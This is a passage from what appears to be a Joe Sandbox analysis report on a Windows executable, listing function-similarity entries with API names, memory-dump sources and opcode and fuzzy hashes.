                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                        • Instruction ID: b54b6577f607a11c2ab33d4551d282ce6759bba3cd0910eb5d0907fc6b618699
                                                                        • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                        • Instruction Fuzzy Hash: ACD1E776B04B56C6EB148F2AC8502AD37B1FB88F88B518426DF4D97B68DF3AD844C350
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 9575b81051ec9d4a2dbca7109e0a5d23717368d5fc25d1fd70a1261be0fad00e
                                                                        • Instruction ID: bdda5b954616c4ddeb81193765dc2c94a84b48b0cbb924d4fd3f6e232117005a
                                                                        • Opcode Fuzzy Hash: 9575b81051ec9d4a2dbca7109e0a5d23717368d5fc25d1fd70a1261be0fad00e
                                                                        • Instruction Fuzzy Hash: 2BD11766B05B419AEB10DBA9D4801EC37B5FB4878CB404476DF0D97BA9DF38E52AC390
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 2000298826-0
                                                                        • Opcode ID: 90d909655ab241022c9b784620f036ea9c35f14059951acd95b4bc1f42379d84
                                                                        • Instruction ID: 108c20441d40a7ce7b6f77750001a69c2a4d6e8f8839d79f6bbd73ea58712b6f
                                                                        • Opcode Fuzzy Hash: 90d909655ab241022c9b784620f036ea9c35f14059951acd95b4bc1f42379d84
                                                                        • Instruction Fuzzy Hash: 51715E36A18B8186E710EB29E4443AE77A1FB89B88F404136EF4D87B69DF7CD545C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMessageMoveRectScreenSend
                                                                        • String ID:
                                                                        • API String ID: 1249313431-0
                                                                        • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                        • Instruction ID: 9fa09a2c12ab4851dc003757697926e1f3bb18fc36bedcefde1a04949badd117
                                                                        • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                        • Instruction Fuzzy Hash: 7C516E36A04A528AEB508F29D4806BD3761FB88B9CF514136DF2DD77A8DF79E881C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 2267087916-0
                                                                        • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                        • Instruction ID: bb66d1657479ef7b47be985a0b2498db539812da43ad665fd7887f502c47cbbb
                                                                        • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                        • Instruction Fuzzy Hash: CE51FD22B05A5185EF508F6AD9400AD23B5FB48B98B948135DF9DA3BA9DF3CD942C300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$socket
                                                                        • String ID:
                                                                        • API String ID: 1881357543-0
                                                                        • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                        • Instruction ID: 431c09a2cd3930bcdc99b8eaf464cef265f15f1454af708f697d16650144a0db
                                                                        • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                        • Instruction Fuzzy Hash: D941906170868286EB24AF1AE41067E6790BB8DFE8F444534DF5E9BBB6CF3CD0118740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 3321077145-0
                                                                        • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                        • Instruction ID: df55c988f46a6e06beedc936545522565c76be523ed4245d37d07ed649e69b9a
                                                                        • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                        • Instruction Fuzzy Hash: 5741C666A08B8681DB14DF2AD49106D77A0FB8DFD8B489432DF5E87776DE38E4448740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                        • Instruction ID: 839b2814c6992124b0a5371b8b2130d153050f75223d5248793c63b9c8042d2f
                                                                        • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                        • Instruction Fuzzy Hash: 7E416C36A08A56C6EA50CF1DD88567937A0FB88B98F655136DB5DC73B0DF39E8498300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                        • String ID:
                                                                        • API String ID: 3076010158-0
                                                                        • Opcode ID: dc6c68aad8de4ec1ea0eac338f153197ea768d30efaa3fb996dae5153308a6de
                                                                        • Instruction ID: 60ed1c730fe643238cd45c06c24ddc3aa43fd7a35948651600ad01ff5fa5a596
                                                                        • Opcode Fuzzy Hash: dc6c68aad8de4ec1ea0eac338f153197ea768d30efaa3fb996dae5153308a6de
                                                                        • Instruction Fuzzy Hash: 6B416836B15B458AEB64CF6AD4406AD37A1FB48B98F244036CF0D97768CF38E895C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                        • Instruction ID: e70b61de81ef8b5f2d7b290ef75c844f4c0f4f069d829b5c12e70edb83703bbe
                                                                        • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                        • Instruction Fuzzy Hash: 1B41D961A0D6C281F7308B29D450AB926A0FB48BD8F541531EBDA536F6CE3CD483C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                        • Instruction ID: f497ecb5aa73fe3474b6e93aa384c6eee0b4db941b3b067d229604e9d31be2c4
                                                                        • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                        • Instruction Fuzzy Hash: 6531A062A086C146EB708B29E4006B92BE4FB5CF98F550135DBD9837A6CE3DD552C750
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 1463438336-0
                                                                        • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                        • Instruction ID: 9b61491b61321f7258ec4ccf4102aa0a0f1afa873681e8599a925daef8ae00e6
                                                                        • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                        • Instruction Fuzzy Hash: 43316C72A08B4282EB24DB1AE450769A361FB4DB98F244135DF5D87B68DF2CE4588F40
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6BB15A27B,?,?,?,00007FF6BB15A236), ref: 00007FF6BB163DB1
                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6BB15A27B,?,?,?,00007FF6BB15A236), ref: 00007FF6BB163E13
                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6BB15A27B,?,?,?,00007FF6BB15A236), ref: 00007FF6BB163E4D
                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6BB15A27B,?,?,?,00007FF6BB15A236), ref: 00007FF6BB163E77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                        • String ID:
                                                                        • API String ID: 1557788787-0
                                                                        • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                        • Instruction ID: 37f0cd554821a45c2e652f62d48f18401707788921f47d17bea792cf18178df5
                                                                        • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                        • Instruction Fuzzy Hash: AC213E31F1879181EA209F1EB44002AB6A5FB98FD4B584135DB9EA3BE4DF3CE452C704
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID:
                                                                        • API String ID: 847901565-0
                                                                        • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                        • Instruction ID: 3cc2159c7986bdd22f2f433a98cf0ce9a02130234be623df76d84f9e3b200f39
                                                                        • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                        • Instruction Fuzzy Hash: 58219A21A08B5185EA549B29A9943397750FF89BA8F154335EB6D877F4CF3CE445C300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                        • Instruction ID: 0244980bbe189e39d05fd2a152960204849687d314e7218f39f2af2d415a275d
                                                                        • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                        • Instruction Fuzzy Hash: D8316F26A48A55C5EB20DB1AF4953BAA360FB88F98F144232DB4D83BB9CF3CD455C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: 1899200771bee30f5d10442384150b4ab3bc3e7a65083385894d3331d558b9f0
                                                                        • Instruction ID: 99a10af20383e2fffd13ac8b5f6d0322826572a0ffcfcc5a77f93d303701bf2c
                                                                        • Opcode Fuzzy Hash: 1899200771bee30f5d10442384150b4ab3bc3e7a65083385894d3331d558b9f0
                                                                        • Instruction Fuzzy Hash: 6E218021A0478186EB149F19E46417873A1FF48FD8B494134DB9E873A5DF7DE4518304
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                        • String ID:
                                                                        • API String ID: 837644225-0
                                                                        • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                        • Instruction ID: 1dad44b2c65e605eea4f4359a60aec2b572a7e4f19a58ff935a79d4e3ada35e3
                                                                        • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                        • Instruction Fuzzy Hash: FB21FF32A18B4186EB04CF29E844768B3A6FB88B99F598539CB1D83764DF3CE841C710
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                        • String ID:
                                                                        • API String ID: 3970641297-0
                                                                        • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                        • Instruction ID: ab3a504a407f8294de87aa924c93b1ed2b0553e60b5b6d283055609ef78b6f03
                                                                        • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                        • Instruction Fuzzy Hash: 64210E72618BC58BE7648B29E4447AAB7A0FB89784F544135DB8D83B64DF7CD494CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 2979156933-0
                                                                        • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                        • Instruction ID: 6c0940633908a1d760b4993495f143f0fd874dee34aea4a7aaf686cbba5a3acd
